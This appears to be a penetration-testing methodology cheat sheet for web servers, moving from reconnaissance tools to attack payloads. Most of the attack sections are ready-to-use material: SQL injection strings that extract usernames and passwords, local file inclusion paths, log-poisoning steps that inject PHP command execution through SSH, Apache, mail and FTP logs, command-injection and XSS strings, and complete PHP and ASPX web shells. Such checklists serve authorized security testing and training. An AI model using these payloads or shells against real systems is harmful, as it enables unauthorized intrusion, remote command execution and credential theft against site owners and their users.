HyperText Transport Protocol
Manual Inspection
Environment Variables / Setup
export IP=
export PORT=80
export URL=http://$IP:$PORT
Initial Reconnaissance
Nmap HTTP Scripts
nmap --script=http-enum,http-headers,http-methods,http-robots.txt,http-title -p$PORT $IP
Nikto
nikto -h $URL -o nikto_results.txt
Technology Stack Identification
whatweb
whatweb $URL
Wappalyzer (Browser Extension)
Quick Manual Checks
Robots.txt & Common Files
curl $URL/robots.txt
curl $URL/sitemap.xml
curl $URL/.git/config
curl $URL/backup.zip
curl $URL/web.config
Directory Enumeration
ffuf -u $URL/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt -fc 404 -t 50
Manual Source Code Review
Look for:
- Hidden form fields
- JavaScript files with sensitive info
- Comments containing credentials/paths
- AJAX endpoints
curl $URL | grep -i -E "(password|user|admin|login|sql|database|config)"
Phase 4: Web Application Attacks
Authentication Bypass
Default Credentials
Common defaults for discovered applications:
- admin:admin, admin:password, root:root, etc.
SQL Injection in Login Forms
# Test basic SQLi in username field:
admin' OR '1'='1'--
admin'/**/OR/**/1=1--
admin' OR 1=1#
# Test in both username and password fields
SQL Injection Testing
Manual Detection
# Test these payloads in parameters:
'
"
\
;
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' UNION SELECT 1,2,3--
Parameter Testing with ffuf
# Test GET parameters
ffuf -u $URL/page.php?id=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt
# Test POST parameters with Burp Suite or manual testing
Union-Based SQLi Exploitation
# Find number of columns
' UNION SELECT 1--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--
# Continue until no error
# Extract database info
' UNION SELECT 1,database(),version()--
' UNION SELECT 1,table_name,3 FROM information_schema.tables--
' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,username,password FROM users--
File Upload Vulnerabilities
Test File Upload Restrictions
# Try uploading:
- .php, .asp, .aspx files
- Files with double extensions (.php.jpg)
- Files with null bytes (shell.php%00.jpg)
- .htaccess files to change execution permissions
PHP Web Shell
<?php system($_GET['cmd']); ?>
Local File Inclusion (LFI)
Common LFI Parameters
Test these parameters for LFI:
?file=
?page=
?include=
?path=
?doc=
LFI Payloads
../../../etc/passwd
../../../windows/system32/drivers/etc/hosts
php://filter/convert.base64-encode/resource=config.php
Log Poisoning via LFI
# SSH Log Poisoning (Linux)
# 1. Attempt SSH connection with PHP payload as username
ssh '<?php system($_GET["cmd"]); ?>'@target_ip
# 2. Include SSH log via LFI
curl "http://target/vulnerable.php?file=../../../var/log/auth.log&cmd=whoami"
# Apache Log Poisoning
# 1. Send request with PHP payload in User-Agent
curl -A '<?php system($_GET["cmd"]); ?>' http://target/
# 2. Include Apache log via LFI
curl "http://target/vulnerable.php?file=../../../var/log/apache2/access.log&cmd=whoami"
# Mail Log Poisoning
# 1. Send email with PHP payload
telnet target 25
MAIL FROM: <?php system($_GET["cmd"]); ?>
RCPT TO: user@target.com
quit
# 2. Include mail log via LFI
curl "http://target/vulnerable.php?file=../../../var/log/mail.log&cmd=whoami"
# FTP Log Poisoning
# 1. Connect to FTP with PHP payload as username
ftp target
user: <?php system($_GET["cmd"]); ?>
# 2. Include FTP log via LFI
curl "http://target/vulnerable.php?file=../../../var/log/vsftpd.log&cmd=whoami"
Common log file locations:
# Linux logs
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/auth.log
/var/log/mail.log
/var/log/vsftpd.log
# Windows logs
C:\xampp\apache\logs\access.log
C:\wamp\logs\access.log
C:\inetpub\logs\LogFiles\W3SVC1\
Cross-Site Scripting (XSS)
Reflected XSS Test
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
Stored XSS Test
Test in comment fields, user profiles, etc.
Command Injection
Common Injection Points
URL parameters, form fields that might execute system commands
Test Payloads
; whoami
| whoami
& whoami
&& whoami
`whoami`
$(whoami)
Phase 5: Burp Suite Manual Testing
Setup
- Configure proxy (127.0.0.1:8080)
- Spider the application
- Review sitemap for interesting endpoints
Manual Testing Checklist
- Test all forms for SQLi, XSS, CSRF
- Check file upload functionality
- Test session management (cookies, tokens)
- Look for admin panels or debugging interfaces
- Test API endpoints if discovered
- Check for IDOR vulnerabilities
Phase 6: CMS-Specific Attacks
WordPress
wpscan --url $URL --enumerate ap,at,u
Joomla
joomscan -u $URL
Drupal
droopescan scan drupal -u $URL
Common Web Shells & Payloads
PHP Web Shell
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>ASPX Web Shell
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
void Page_Load(object sender, EventArgs e){
string cmd = Request["cmd"];
if(cmd != null){
Response.Write(ExecuteCommand(cmd));
}
}
string ExecuteCommand(string command){
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.Arguments = "/c " + command;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.Start();
return p.StandardOutput.ReadToEnd();
}
</script>Next Steps
Once web enumeration is complete:
- Document all findings in main template
- Prioritize vulnerabilities by exploitability
- Attempt exploitation for initial access
- Look for credentials in web files for lateral movement